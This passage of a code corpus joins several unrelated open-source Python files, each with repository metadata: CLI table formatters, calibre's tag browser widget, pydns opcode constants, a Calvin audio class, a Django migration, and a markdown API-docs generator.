"""Return pretty-formatted item."""
schema = [('name', '_id', None),
('type', 'group-type', None),
('cells', None, None),
('pattern', None, None),
('endpoints', None, None),
('data', None, None)]
format_item = make_dict_to_table(schema)
format_list = make_list_to_table(schema)
if isinstance(item, list):
return format_list(item)
else:
return format_item(item)
class TenantPrettyFormatter(object):
"""Pretty table tenant formatter."""
@staticmethod
def format(item):
"""Return pretty-formatted item."""
schema = [
('tenant', ['_id', 'tenant'], None),
('system', 'systems', None),
('allocations', 'allocations', AllocationPrettyFormatter.format),
]
format_item = make_dict_to_table(schema)
format_list = make_list_to_table(schema)
if isinstance(item, list):
return format_list(item)
else:
return format_item(item)
class AllocationPrettyFormatter(object):
"""Pretty table allocation formatter."""
@staticmethod
def format(item):
"""Return pretty-formatted item."""
assignments_table = make_list_to_table([
('pattern', None, None),
('priority', None, None),
])
cell_tbl = make_list_to_table([
('cell', 'cell', None),
('partition', None, None),
('rank', None, None),
('max-utilization', None, None),
('memory', None, None),
('cpu', None, None),
('disk', None, None),
('traits', None, '\n'.join),
('assignments', None, assignments_table),
])
schema = [
('name', '_id', None),
('environment', None, None),
('reservations', None, cell_tbl),
]
format_item = make_dict_to_table(schema)
format_list = make_list_to_table(schema)
if isinstance(item, list):
return format_list(item)
else:
return format_item(item)
class InstanceStatePrettyFormatter(object):
"""Pretty table instance state formatter."""
@staticmethod
def format(item):
"""Return pretty-formatted item."""
schema = [
('name', None, None),
('state', None, None),
('host', None, None),
]
format_item = make_dict_to_table(schema)
format_list = make_list_to_table(schema, header=False)
if isinstance(item, list):
return format_list(item)
else:
return format_item(item)
class EndpointPrettyFormatter(object):
"""Pretty table endpoint formatter."""
@staticmethod
def format(item):
"""Return pretty-formatted item."""
schema = [
('name', None, None),
('proto', None, None),
('endpoint', None, None),
('hostport', None, None),
]
format_item = make_dict_to_table(schema)
format_list = make_list_to_table(schema, header=False)
if isinstance(item, list):
return format_list(item)
else:
return format_item(item)
class PartitionPrettyFormatter(object):
"""Pretty table partition formatter."""
@staticmethod
def format(item):
"""Return pretty-formatted item."""
schema = [
('id', 'partition', None),
('cell', None, None),
('cpu', None, None),
('disk', None, None),
('memory', None, None),
('down threshold', 'down-threshold', None),
]
format_item = make_dict_to_table(schema)
format_list = make_list_to_table(schema)
if isinstance(item, list):
return format_list(item)
else:
return format_item(item)
class CronPrettyFormatter(object):
"""Pretty table formatter for cron jobs."""
@staticmethod
def format(item):
"""Return pretty-formatted item."""
schema = [
('id', '_id', None),
('resource', None, None),
('event', None, None),
('action', None, None),
('count', None, None),
('expression', None, None),
('next_run_time', None, None),
('timezone', None, None),
]
format_item = make_dict_to_table(schema)
format_list = make_list_to_table(schema)
if isinstance(item, list):
return format_list(item)
else:
return format_item(item)
def bad_exit(string, *args):
"""System exit non-zero with a string to sys.stderr.
The printing takes care of the newline"""
if args:
string = string % args
click.echo(string, err=True)
sys.exit(-1)
def echo_colour(colour, string, *args):
"""click.echo colour with support for placeholders, e.g. %s"""
if args:
string = string % args
click.echo(click.style(string, fg=colour))
def echo_green(string, *args):
"""click.echo green with support for placeholders, e.g. %s"""
echo_colour('green', string, *args)
def echo_yellow(string, *args):
"""click.echo yellow with support for placeholders, e.g. %s"""
echo_colour('yellow', string, *args)
def echo_red(string, *args):
"""click.echo yellow with support for placeholders, e.g. %s"""
echo_colour('red', string, *args)
def handle_not_authorized(err):
"""Handle REST NotAuthorizedExceptions"""
msg = str(err)
msgs = [re.sub(r'failure: ', ' ', line) for line in msg.split(r'\n')]
echo_red('Not authorized.')
click.echo('\n'.join(msgs), nl=False)
REST_EXCEPTIONS = [
(restclient.NotFoundError, 'Resource not found'),
(restclient.AlreadyExistsError, 'Resource already exists'),
(restclient.ValidationError, None),
(restclient.NotAuthorizedError, handle_not_authorized),
(restclient.BadRequestError, None),
(restclient.MaxRequestRetriesError, None)
]
ON_REST_EXCEPTIONS = handle_exceptions(REST_EXCEPTIONS)
|
ThoughtWorksInc/treadmill
|
treadmill/cli/__init__.py
|
Python
|
apache-2.0
| 26,172
|
#!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2011, Kovid Goyal <kovid@kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
from functools import partial
from PyQt4.Qt import (Qt, QIcon, QWidget, QHBoxLayout, QVBoxLayout, QShortcut,
QKeySequence, QToolButton, QString, QLabel, QFrame, QTimer,
QMenu, QPushButton, QActionGroup)
from calibre.gui2 import error_dialog, question_dialog
from calibre.gui2.widgets import HistoryLineEdit
from calibre.library.field_metadata import category_icon_map
from calibre.utils.icu import sort_key
from calibre.gui2.tag_browser.view import TagsView
from calibre.ebooks.metadata import title_sort
from calibre.gui2.dialogs.tag_categories import TagCategories
from calibre.gui2.dialogs.tag_list_editor import TagListEditor
from calibre.gui2.dialogs.edit_authors_dialog import EditAuthorsDialog
class TagBrowserMixin(object): # {{{
def __init__(self, db):
self.library_view.model().count_changed_signal.connect(self.tags_view.recount)
self.tags_view.set_database(db, self.alter_tb)
self.tags_view.tags_marked.connect(self.search.set_search_string)
self.tags_view.tags_list_edit.connect(self.do_tags_list_edit)
self.tags_view.edit_user_category.connect(self.do_edit_user_categories)
self.tags_view.delete_user_category.connect(self.do_delete_user_category)
self.tags_view.del_item_from_user_cat.connect(self.do_del_item_from_user_cat)
self.tags_view.add_subcategory.connect(self.do_add_subcategory)
self.tags_view.add_item_to_user_cat.connect(self.do_add_item_to_user_cat)
self.tags_view.saved_search_edit.connect(self.do_saved_search_edit)
self.tags_view.rebuild_saved_searches.connect(self.do_rebuild_saved_searches)
self.tags_view.author_sort_edit.connect(self.do_author_sort_edit)
self.tags_view.tag_item_renamed.connect(self.do_tag_item_renamed)
self.tags_view.search_item_renamed.connect(self.saved_searches_changed)
self.tags_view.drag_drop_finished.connect(self.drag_drop_finished)
self.tags_view.restriction_error.connect(self.do_restriction_error,
type=Qt.QueuedConnection)
self.tags_view.tag_item_delete.connect(self.do_tag_item_delete)
for text, func, args, cat_name in (
(_('Manage Authors'),
self.do_author_sort_edit, (self, None), 'authors'),
(_('Manage Series'),
self.do_tags_list_edit, (None, 'series'), 'series'),
(_('Manage Publishers'),
self.do_tags_list_edit, (None, 'publisher'), 'publisher'),
(_('Manage Tags'),
self.do_tags_list_edit, (None, 'tags'), 'tags'),
(_('Manage User Categories'),
self.do_edit_user_categories, (None,), 'user:'),
(_('Manage Saved Searches'),
self.do_saved_search_edit, (None,), 'search')
):
m = self.alter_tb.manage_menu
m.addAction(QIcon(I(category_icon_map[cat_name])), text,
partial(func, *args))
def do_restriction_error(self):
error_dialog(self.tags_view, _('Invalid search restriction'),
_('The current search restriction is invalid'), show=True)
def do_add_subcategory(self, on_category_key, new_category_name=None):
'''
Add a subcategory to the category 'on_category'. If new_category_name is
None, then a default name is shown and the user is offered the
opportunity to edit the name.
'''
db = self.library_view.model().db
user_cats = db.prefs.get('user_categories', {})
# Ensure that the temporary name we will use is not already there
i = 0
if new_category_name is not None:
new_name = new_category_name.replace('.', '')
else:
new_name = _('New Category').replace('.', '')
n = new_name
while True:
new_cat = on_category_key[1:] + '.' + n
if new_cat not in user_cats:
break
i += 1
n = new_name + unicode(i)
# Add the new category
user_cats[new_cat] = []
db.prefs.set('user_categories', user_cats)
self.tags_view.recount()
m = self.tags_view.model()
idx = m.index_for_path(m.find_category_node('@' + new_cat))
self.tags_view.show_item_at_index(idx)
# Open the editor on the new item to rename it
if new_category_name is None:
self.tags_view.edit(idx)
def do_edit_user_categories(self, on_category=None):
'''
Open the user categories editor.
'''
db = self.library_view.model().db
d = TagCategories(self, db, on_category)
if d.exec_() == d.Accepted:
db.prefs.set('user_categories', d.categories)
db.field_metadata.remove_user_categories()
for k in d.categories:
db.field_metadata.add_user_category('@' + k, k)
db.data.change_search_locations(db.field_metadata.get_search_terms())
self.tags_view.recount()
def do_delete_user_category(self, category_name):
'''
Delete the user category named category_name. Any leading '@' is removed
'''
if category_name.startswith('@'):
category_name = category_name[1:]
db = self.library_view.model().db
user_cats = db.prefs.get('user_categories', {})
cat_keys = sorted(user_cats.keys(), key=sort_key)
has_children = False
found = False
for k in cat_keys:
if k == category_name:
found = True
has_children = len(user_cats[k])
elif k.startswith(category_name + '.'):
has_children = True
if not found:
return error_dialog(self.tags_view, _('Delete user category'),
_('%s is not a user category')%category_name, show=True)
if has_children:
if not question_dialog(self.tags_view, _('Delete user category'),
_('%s contains items. Do you really '
'want to delete it?')%category_name):
return
for k in cat_keys:
if k == category_name:
del user_cats[k]
elif k.startswith(category_name + '.'):
del user_cats[k]
db.prefs.set('user_categories', user_cats)
self.tags_view.recount()
def do_del_item_from_user_cat(self, user_cat, item_name, item_category):
'''
Delete the item (item_name, item_category) from the user category with
key user_cat. Any leading '@' characters are removed
'''
if user_cat.startswith('@'):
user_cat = user_cat[1:]
db = self.library_view.model().db
user_cats = db.prefs.get('user_categories', {})
if user_cat not in user_cats:
error_dialog(self.tags_view, _('Remove category'),
_('User category %s does not exist')%user_cat,
show=True)
return
self.tags_view.model().delete_item_from_user_category(user_cat,
item_name, item_category)
self.tags_view.recount()
def do_add_item_to_user_cat(self, dest_category, src_name, src_category):
'''
Add the item src_name in src_category to the user category
dest_category. Any leading '@' is removed
'''
db = self.library_view.model().db
user_cats = db.prefs.get('user_categories', {})
if dest_category and dest_category.startswith('@'):
dest_category = dest_category[1:]
if dest_category not in user_cats:
return error_dialog(self.tags_view, _('Add to user category'),
_('A user category %s does not exist')%dest_category, show=True)
# Now add the item to the destination user category
add_it = True
if src_category == 'news':
src_category = 'tags'
for tup in user_cats[dest_category]:
if src_name == tup[0] and src_category == tup[1]:
add_it = False
if add_it:
user_cats[dest_category].append([src_name, src_category, 0])
db.prefs.set('user_categories', user_cats)
self.tags_view.recount()
def do_tags_list_edit(self, tag, category):
'''
Open the 'manage_X' dialog where X == category. If tag is not None, the
dialog will position the editor on that item.
'''
tags_model = self.tags_view.model()
result = tags_model.get_category_editor_data(category)
if result is None:
return
if category == 'series':
key = lambda x:sort_key(title_sort(x))
else:
key = sort_key
db=self.library_view.model().db
d = TagListEditor(self, cat_name=db.field_metadata[category]['name'],
tag_to_match=tag, data=result, sorter=key)
d.exec_()
if d.result() == d.Accepted:
to_rename = d.to_rename # dict of old id to new name
to_delete = d.to_delete # list of ids
orig_name = d.original_names # dict of id: name
rename_func = None
if category == 'tags':
rename_func = db.rename_tag
delete_func = db.delete_tag_using_id
elif category == 'series':
rename_func = db.rename_series
delete_func = db.delete_series_using_id
elif category == 'publisher':
rename_func = db.rename_publisher
delete_func = db.delete_publisher_using_id
else: # must be custom
cc_label = db.field_metadata[category]['label']
rename_func = partial(db.rename_custom_item, label=cc_label)
delete_func = partial(db.delete_custom_item_using_id, label=cc_label)
m = self.tags_view.model()
if rename_func:
for item in to_delete:
delete_func(item)
m.delete_item_from_all_user_categories(orig_name[item], category)
for old_id in to_rename:
rename_func(old_id, new_name=unicode(to_rename[old_id]))
m.rename_item_in_all_user_categories(orig_name[old_id],
category, unicode(to_rename[old_id]))
# Clean up the library view
self.do_tag_item_renamed()
self.tags_view.recount()
def do_tag_item_delete(self, category, item_id, orig_name):
'''
Delete an item from some category.
'''
if not question_dialog(self.tags_view,
title=_('Delete item'),
msg='<p>'+
_('%s will be deleted from all books. Are you sure?')
%orig_name,
skip_dialog_name='tag_item_delete',
skip_dialog_msg=_('Show this confirmation again')):
return
db = self.current_db
if category == 'tags':
delete_func = db.delete_tag_using_id
elif category == 'series':
delete_func = db.delete_series_using_id
elif category == 'publisher':
delete_func = db.delete_publisher_using_id
else: # must be custom
cc_label = db.field_metadata[category]['label']
delete_func = partial(db.delete_custom_item_using_id, label=cc_label)
m = self.tags_view.model()
if delete_func:
delete_func(item_id)
m.delete_item_from_all_user_categories(orig_name, category)
# Clean up the library view
self.do_tag_item_renamed()
self.tags_view.recount()
def do_tag_item_renamed(self):
# Clean up library view and search
# get information to redo the selection
rows = [r.row() for r in
self.library_view.selectionModel().selectedRows()]
m = self.library_view.model()
ids = [m.id(r) for r in rows]
m.refresh(reset=False)
m.research()
self.library_view.select_rows(ids)
# refreshing the tags view happens at the emit()/call() site
def do_author_sort_edit(self, parent, id_, select_sort=True, select_link=False):
'''
Open the manage authors dialog
'''
db = self.library_view.model().db
editor = EditAuthorsDialog(parent, db, id_, select_sort, select_link)
d = editor.exec_()
if d:
# Save and restore the current selections. Note that some changes
# will cause sort orders to change, so don't bother with attempting
# to restore the position. Restoring the state has the side effect
# of refreshing book details.
with self.library_view.preserve_state(preserve_hpos=False, preserve_vpos=False):
for (id2, old_author, new_author, new_sort, new_link) in editor.result:
if old_author != new_author:
# The id might change if the new author already exists
id2 = db.rename_author(id2, new_author)
db.set_sort_field_for_author(id2, unicode(new_sort),
commit=False, notify=False)
db.set_link_field_for_author(id2, unicode(new_link),
commit=False, notify=False)
db.commit()
self.library_view.model().refresh()
self.tags_view.recount()
def drag_drop_finished(self, ids):
self.library_view.model().refresh_ids(ids)
# }}}
class TagBrowserWidget(QWidget): # {{{
def __init__(self, parent):
QWidget.__init__(self, parent)
self.parent = parent
self._layout = QVBoxLayout()
self.setLayout(self._layout)
self._layout.setContentsMargins(0,0,0,0)
# Set up the find box & button
search_layout = QHBoxLayout()
self._layout.addLayout(search_layout)
self.item_search = HistoryLineEdit(parent)
self.item_search.setMinimumContentsLength(5)
self.item_search.setSizeAdjustPolicy(self.item_search.AdjustToMinimumContentsLengthWithIcon)
try:
self.item_search.lineEdit().setPlaceholderText(
_('Find item in tag browser'))
except:
pass # Using Qt < 4.7
self.item_search.setToolTip(_(
'Search for items. This is a "contains" search; items containing the\n'
'text anywhere in the name will be found. You can limit the search\n'
'to particular categories using syntax similar to search. For example,\n'
'tags:foo will find foo in any tag, but not in authors etc. Entering\n'
'*foo will filter all categories at once, showing only those items\n'
'containing the text "foo"'))
search_layout.addWidget(self.item_search)
# Not sure if the shortcut should be translatable ...
sc = QShortcut(QKeySequence(_('ALT+f')), parent)
sc.activated.connect(self.set_focus_to_find_box)
self.search_button = QToolButton()
self.search_button.setText(_('F&ind'))
self.search_button.setToolTip(_('Find the first/next matching item'))
search_layout.addWidget(self.search_button)
self.expand_button = QToolButton()
self.expand_button.setText('-')
self.expand_button.setToolTip(_('Collapse all categories'))
search_layout.addWidget(self.expand_button)
search_layout.setStretch(0, 10)
search_layout.setStretch(1, 1)
search_layout.setStretch(2, 1)
self.current_find_position = None
self.search_button.clicked.connect(self.find)
self.item_search.initialize('tag_browser_search')
self.item_search.lineEdit().returnPressed.connect(self.do_find)
self.item_search.lineEdit().textEdited.connect(self.find_text_changed)
self.item_search.activated[QString].connect(self.do_find)
self.item_search.completer().setCaseSensitivity(Qt.CaseSensitive)
parent.tags_view = TagsView(parent)
self.tags_view = parent.tags_view
self.expand_button.clicked.connect(self.tags_view.collapseAll)
self._layout.addWidget(parent.tags_view)
# Now the floating 'not found' box
l = QLabel(self.tags_view)
self.not_found_label = l
l.setFrameStyle(QFrame.StyledPanel)
l.setAutoFillBackground(True)
l.setText('<p><b>'+_('No More Matches.</b><p> Click Find again to go to first match'))
l.setAlignment(Qt.AlignVCenter)
l.setWordWrap(True)
l.resize(l.sizeHint())
l.move(10,20)
l.setVisible(False)
self.not_found_label_timer = QTimer()
self.not_found_label_timer.setSingleShot(True)
self.not_found_label_timer.timeout.connect(self.not_found_label_timer_event,
type=Qt.QueuedConnection)
parent.alter_tb = l = QPushButton(parent)
l.setText(_('Alter Tag Browser'))
l.setIcon(QIcon(I('tags.png')))
l.m = QMenu()
l.setMenu(l.m)
self._layout.addWidget(l)
sb = l.m.addAction(_('Sort by'))
sb.m = l.sort_menu = QMenu(l.m)
sb.setMenu(sb.m)
sb.bg = QActionGroup(sb)
# Must be in the same order as db2.CATEGORY_SORTS
for i, x in enumerate((_('Sort by name'), _('Sort by popularity'),
_('Sort by average rating'))):
a = sb.m.addAction(x)
sb.bg.addAction(a)
a.setCheckable(True)
if i == 0:
a.setChecked(True)
sb.setToolTip(
_('Set the sort order for entries in the Tag Browser'))
sb.setStatusTip(sb.toolTip())
ma = l.m.addAction(_('Search type when selecting multiple items'))
ma.m = l.match_menu = QMenu(l.m)
ma.setMenu(ma.m)
ma.ag = QActionGroup(ma)
# Must be in the same order as db2.MATCH_TYPE
for i, x in enumerate((_('Match any of the items'), _('Match all of the items'))):
a = ma.m.addAction(x)
ma.ag.addAction(a)
a.setCheckable(True)
if i == 0:
a.setChecked(True)
ma.setToolTip(
_('When selecting multiple entries in the Tag Browser '
'match any or all of them'))
ma.setStatusTip(ma.toolTip())
mt = l.m.addAction(_('Manage authors, tags, etc'))
mt.setToolTip(_('All of these category_managers are available by right-clicking '
'on items in the tag browser above'))
mt.m = l.manage_menu = QMenu(l.m)
mt.setMenu(mt.m)
# self.leak_test_timer = QTimer(self)
# self.leak_test_timer.timeout.connect(self.test_for_leak)
# self.leak_test_timer.start(5000)
def set_pane_is_visible(self, to_what):
self.tags_view.set_pane_is_visible(to_what)
def find_text_changed(self, str):
self.current_find_position = None
def set_focus_to_find_box(self):
self.item_search.setFocus()
self.item_search.lineEdit().selectAll()
def do_find(self, str=None):
self.current_find_position = None
self.find()
def find(self):
model = self.tags_view.model()
model.clear_boxed()
txt = unicode(self.item_search.currentText()).strip()
if txt.startswith('*'):
model.set_categories_filter(txt[1:])
self.tags_view.recount()
self.current_find_position = None
return
if model.get_categories_filter():
model.set_categories_filter(None)
self.tags_view.recount()
self.current_find_position = None
if not txt:
return
self.item_search.lineEdit().blockSignals(True)
self.search_button.setFocus(True)
self.item_search.lineEdit().blockSignals(False)
key = None
colon = txt.rfind(':') if len(txt) > 2 else 0
if colon > 0:
key = self.parent.library_view.model().db.\
field_metadata.search_term_to_field_key(txt[:colon])
txt = txt[colon+1:]
self.current_find_position = \
model.find_item_node(key, txt, self.current_find_position)
if self.current_find_position:
self.tags_view.show_item_at_path(self.current_find_position, box=True)
elif self.item_search.text():
self.not_found_label.setVisible(True)
if self.tags_view.verticalScrollBar().isVisible():
sbw = self.tags_view.verticalScrollBar().width()
else:
sbw = 0
width = self.width() - 8 - sbw
height = self.not_found_label.heightForWidth(width) + 20
self.not_found_label.resize(width, height)
self.not_found_label.move(4, 10)
self.not_found_label_timer.start(2000)
def not_found_label_timer_event(self):
self.not_found_label.setVisible(False)
# }}}
|
pra85/calibre
|
src/calibre/gui2/tag_browser/ui.py
|
Python
|
gpl-3.0
| 21,727
|
"""
$Id: Opcode.py,v 1.6.2.1 2011/03/16 20:06:39 customdesigned Exp $
This file is part of the pydns project.
Homepage: http://pydns.sourceforge.net
This code is covered by the standard Python License. See LICENSE for details.
Opcode values in message header. RFC 1035, 1996, 2136.
"""
QUERY = 0
IQUERY = 1
STATUS = 2
NOTIFY = 4
UPDATE = 5
# Construct reverse mapping dictionary
_names = dir()
opcodemap = {}
for _name in _names:
if _name[0] != '_': opcodemap[eval(_name)] = _name
def opcodestr(opcode):
if opcodemap.has_key(opcode): return opcodemap[opcode]
else: return `opcode`
#
# $Log: Opcode.py,v $
# Revision 1.6.2.1 2011/03/16 20:06:39 customdesigned
# Refer to explicit LICENSE file.
#
# Revision 1.6 2002/04/23 10:51:43 anthonybaxter
# Added UPDATE, NOTIFY.
#
# Revision 1.5 2002/03/19 12:41:33 anthonybaxter
# tabnannied and reindented everything. 4 space indent, no tabs.
# yay.
#
# Revision 1.4 2002/03/19 12:26:13 anthonybaxter
# death to leading tabs.
#
# Revision 1.3 2001/08/09 09:08:55 anthonybaxter
# added identifying header to top of each file
#
# Revision 1.2 2001/07/19 06:57:07 anthony
# cvs keywords added
#
#
|
g-fleischer/wtfy
|
trackingserver/thirdparty/pydns/DNS/Opcode.py
|
Python
|
gpl-3.0
| 1,174
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from calvin.runtime.south.calvinsys import base_calvinsys_object
class BasePlay(base_calvinsys_object.BaseCalvinsysObject):
"""
Play audio file
"""
init_schema = {
"type": "object",
"properties": {
"audiofile": {
"description": "location of file to play",
"type": "string"
}
},
"description": "Set up audio player"
}
can_write_schema = {
"description": "True iff audio is ready to be played",
"type": "boolean"
}
write_schema = {
"description": "Play specified audio file, either specified in argument or at init",
"type": ["null", "boolean", "string"]
}
|
EricssonResearch/calvin-base
|
calvinextras/calvinsys/media/audio/play/BasePlay.py
|
Python
|
apache-2.0
| 1,328
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-01-26 21:14
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('documents', '0006_auto_20160123_0430'),
]
operations = [
migrations.AddField(
model_name='tag',
name='match',
field=models.CharField(blank=True, max_length=256),
),
migrations.AddField(
model_name='tag',
name='matching_algorithm',
field=models.PositiveIntegerField(blank=True, choices=[(1, 'Any'), (2, 'All'), (3, 'Literal'), (4, 'Regular Expression')], help_text='Which algorithm you want to use when matching text to the OCR\'d PDF. Here, "any" looks for any occurrence of any word provided in the PDF, while "all" requires that every word provided appear in the PDF, albeit not in the order provided. A "literal" match means that the text you enter must appear in the PDF exactly as you\'ve entered it, and "regular expression" uses a regex to match the PDF. If you don\'t know what a regex is, you probably don\'t want this option.', null=True),
),
migrations.AlterField(
model_name='tag',
name='colour',
field=models.PositiveIntegerField(choices=[(1, '#a6cee3'), (2, '#1f78b4'), (3, '#b2df8a'), (4, '#33a02c'), (5, '#fb9a99'), (6, '#e31a1c'), (7, '#fdbf6f'), (8, '#ff7f00'), (9, '#cab2d6'), (10, '#6a3d9a'), (11, '#b15928'), (12, '#000000'), (13, '#cccccc')], default=1),
),
]
|
fwilk/paperless
|
src/documents/migrations/0007_auto_20160126_2114.py
|
Python
|
gpl-3.0
| 1,579
|
# coding: utf-8
from __future__ import unicode_literals, division, absolute_import, print_function
import re
import os
import ast
import _ast
import textwrap
import CommonMark
from collections import OrderedDict
cur_dir = os.path.dirname(__file__)
project_dir = os.path.abspath(os.path.join(cur_dir, '..'))
docs_dir = os.path.join(project_dir, 'docs')
module_name = 'certvalidator'
# Maps a markdown document to a Python source file to look in for
# class/method/function docstrings
MD_SOURCE_MAP = {
'docs/api.md': [
'certvalidator/__init__.py',
'certvalidator/context.py',
],
}
# A search/replace dictionary to modify docstring contents before generating
# markdown from them
definition_replacements = {}
if hasattr(CommonMark, 'DocParser'):
raise EnvironmentError("CommonMark must be version 0.6.0 or newer")
def _get_func_info(docstring, def_lineno, code_lines, prefix):
"""
Extracts the function signature and description of a Python function
:param docstring:
A unicode string of the docstring for the function
:param def_lineno:
An integer line number that function was defined on
:param code_lines:
A list of unicode string lines from the source file the function was
defined in
:param prefix:
A prefix to prepend to all output lines
:return:
A 2-element tuple:
- [0] A unicode string of the function signature with a docstring of
parameter info
- [1] A markdown snippet of the function description
"""
def_index = def_lineno - 1
definition = code_lines[def_index]
definition = definition.rstrip()
while not definition.endswith(':'):
def_index += 1
definition += '\n' + code_lines[def_index].rstrip()
definition = textwrap.dedent(definition).rstrip(':')
definition = definition.replace('\n', '\n' + prefix)
description = ''
found_colon = False
params = ''
for line in docstring.splitlines():
if line and line[0] == ':':
found_colon = True
if not found_colon:
if description:
description += '\n'
description += line
else:
if params:
params += '\n'
params += line
description = description.strip()
description_md = ''
if description:
description_md = '%s%s' % (prefix, description.replace('\n', '\n' + prefix))
description_md = re.sub('\n>(\\s+)\n', '\n>\n', description_md)
params = params.strip()
if params:
definition += (':\n%s """\n%s ' % (prefix, prefix))
definition += params.replace('\n', '\n%s ' % prefix)
definition += ('\n%s """' % prefix)
definition = re.sub('\n>(\\s+)\n', '\n>\n', definition)
for search, replace in definition_replacements.items():
definition = definition.replace(search, replace)
return (definition, description_md)
def _find_sections(md_ast, sections, last, last_class, total_lines=None):
"""
Walks through a CommonMark AST to find section headers that delineate
content that should be updated by this script
:param md_ast:
The AST of the markdown document
:param sections:
A dict to store the start and end lines of a section. The key will be
a two-element tuple of the section type ("class", "function",
"method" or "attribute") and identifier. The values are a two-element
tuple of the start and end line number in the markdown document of the
section.
:param last:
A dict containing information about the last section header seen.
Includes the keys "type_name", "identifier", "start_line".
:param last_class:
A unicode string of the name of the last class found - used when
processing methods and attributes.
:param total_lines:
An integer of the total number of lines in the markdown document -
used to work around a bug in the API of the Python port of CommonMark
"""
def child_walker(node):
for child, entering in node.walker():
if child == node:
continue
yield child, entering
for child, entering in child_walker(md_ast):
if child.t == 'heading':
start_line = child.sourcepos[0][0]
if child.level == 2:
if last:
sections[(last['type_name'], last['identifier'])] = (last['start_line'], start_line - 1)
last.clear()
if child.level in set([3, 5]):
heading_elements = []
for heading_child, _ in child_walker(child):
heading_elements.append(heading_child)
if len(heading_elements) != 2:
continue
first = heading_elements[0]
second = heading_elements[1]
if first.t != 'code':
continue
if second.t != 'text':
continue
type_name = second.literal.strip()
identifier = first.literal.strip().replace('()', '').lstrip('.')
if last:
sections[(last['type_name'], last['identifier'])] = (last['start_line'], start_line - 1)
last.clear()
if type_name == 'function':
if child.level != 3:
continue
if type_name == 'class':
if child.level != 3:
continue
last_class.append(identifier)
if type_name in set(['method', 'attribute']):
if child.level != 5:
continue
identifier = last_class[-1] + '.' + identifier
last.update({
'type_name': type_name,
'identifier': identifier,
'start_line': start_line,
})
elif child.t == 'block_quote':
find_sections(child, sections, last, last_class)
if last:
sections[(last['type_name'], last['identifier'])] = (last['start_line'], total_lines)
find_sections = _find_sections
def walk_ast(node, code_lines, sections, md_chunks):
"""
A callback used to walk the Python AST looking for classes, functions,
methods and attributes. Generates chunks of markdown markup to replace
the existing content.
:param node:
An _ast module node object
:param code_lines:
A list of unicode strings - the source lines of the Python file
:param sections:
A dict of markdown document sections that need to be updated. The key
will be a two-element tuple of the section type ("class", "function",
"method" or "attribute") and identifier. The values are a two-element
tuple of the start and end line number in the markdown document of the
section.
:param md_chunks:
A dict with keys from the sections param and the values being a unicode
string containing a chunk of markdown markup.
"""
if isinstance(node, _ast.FunctionDef):
key = ('function', node.name)
if key not in sections:
return
docstring = ast.get_docstring(node)
def_lineno = node.lineno + len(node.decorator_list)
definition, description_md = _get_func_info(docstring, def_lineno, code_lines, '> ')
md_chunk = textwrap.dedent("""
### `%s()` function
> ```python
> %s
> ```
>
%s
""").strip() % (
node.name,
definition,
description_md
) + "\n"
md_chunks[key] = md_chunk
elif isinstance(node, _ast.ClassDef):
if ('class', node.name) not in sections:
return
for subnode in node.body:
if isinstance(subnode, _ast.FunctionDef):
node_id = node.name + '.' + subnode.name
method_key = ('method', node_id)
is_method = method_key in sections
attribute_key = ('attribute', node_id)
is_attribute = attribute_key in sections
is_constructor = subnode.name == '__init__'
if not is_constructor and not is_attribute and not is_method:
continue
docstring = ast.get_docstring(subnode)
def_lineno = subnode.lineno + len(subnode.decorator_list)
if not docstring:
continue
if is_method or is_constructor:
definition, description_md = _get_func_info(docstring, def_lineno, code_lines, '> > ')
if is_constructor:
key = ('class', node.name)
class_docstring = ast.get_docstring(node) or ''
class_description = textwrap.dedent(class_docstring).strip()
if class_description:
class_description_md = "> %s\n>" % (class_description.replace("\n", "\n> "))
else:
class_description_md = ''
md_chunk = textwrap.dedent("""
### `%s()` class
%s
> ##### constructor
>
> > ```python
> > %s
> > ```
> >
%s
""").strip() % (
node.name,
class_description_md,
definition,
description_md
)
md_chunk = md_chunk.replace('\n\n\n', '\n\n')
else:
key = method_key
md_chunk = textwrap.dedent("""
>
> ##### `.%s()` method
>
> > ```python
> > %s
> > ```
> >
%s
""").strip() % (
subnode.name,
definition,
description_md
)
if md_chunk[-5:] == '\n> >\n':
md_chunk = md_chunk[0:-5]
else:
key = attribute_key
description = textwrap.dedent(docstring).strip()
description_md = "> > %s" % (description.replace("\n", "\n> > "))
md_chunk = textwrap.dedent("""
>
> ##### `.%s` attribute
>
%s
""").strip() % (
subnode.name,
description_md
)
md_chunks[key] = re.sub('[ \\t]+\n', '\n', md_chunk.rstrip())
elif isinstance(node, _ast.If):
for subast in node.body:
walk_ast(subast, code_lines, sections, md_chunks)
for subast in node.orelse:
walk_ast(subast, code_lines, sections, md_chunks)
def run():
"""
Looks through the docs/ dir and parses each markdown document, looking for
sections to update from Python docstrings. Looks for section headers in
the format:
- ### `ClassName()` class
- ##### `.method_name()` method
- ##### `.attribute_name` attribute
- ### `function_name()` function
The markdown content following these section headers up until the next
section header will be replaced by new markdown generated from the Python
docstrings of the associated source files.
By default maps docs/{name}.md to {modulename}/{name}.py. Allows for
custom mapping via the MD_SOURCE_MAP variable.
"""
print('Updating API docs...')
md_files = []
for root, _, filenames in os.walk(docs_dir):
for filename in filenames:
if not filename.endswith('.md'):
continue
md_files.append(os.path.join(root, filename))
parser = CommonMark.Parser()
for md_file in md_files:
md_file_relative = md_file[len(project_dir) + 1:]
if md_file_relative in MD_SOURCE_MAP:
py_files = MD_SOURCE_MAP[md_file_relative]
py_paths = [os.path.join(project_dir, py_file) for py_file in py_files]
else:
py_files = [os.path.basename(md_file).replace('.md', '.py')]
py_paths = [os.path.join(project_dir, module_name, py_files[0])]
if not os.path.exists(py_paths[0]):
continue
with open(md_file, 'rb') as f:
markdown = f.read().decode('utf-8')
original_markdown = markdown
md_lines = list(markdown.splitlines())
md_ast = parser.parse(markdown)
last_class = []
last = {}
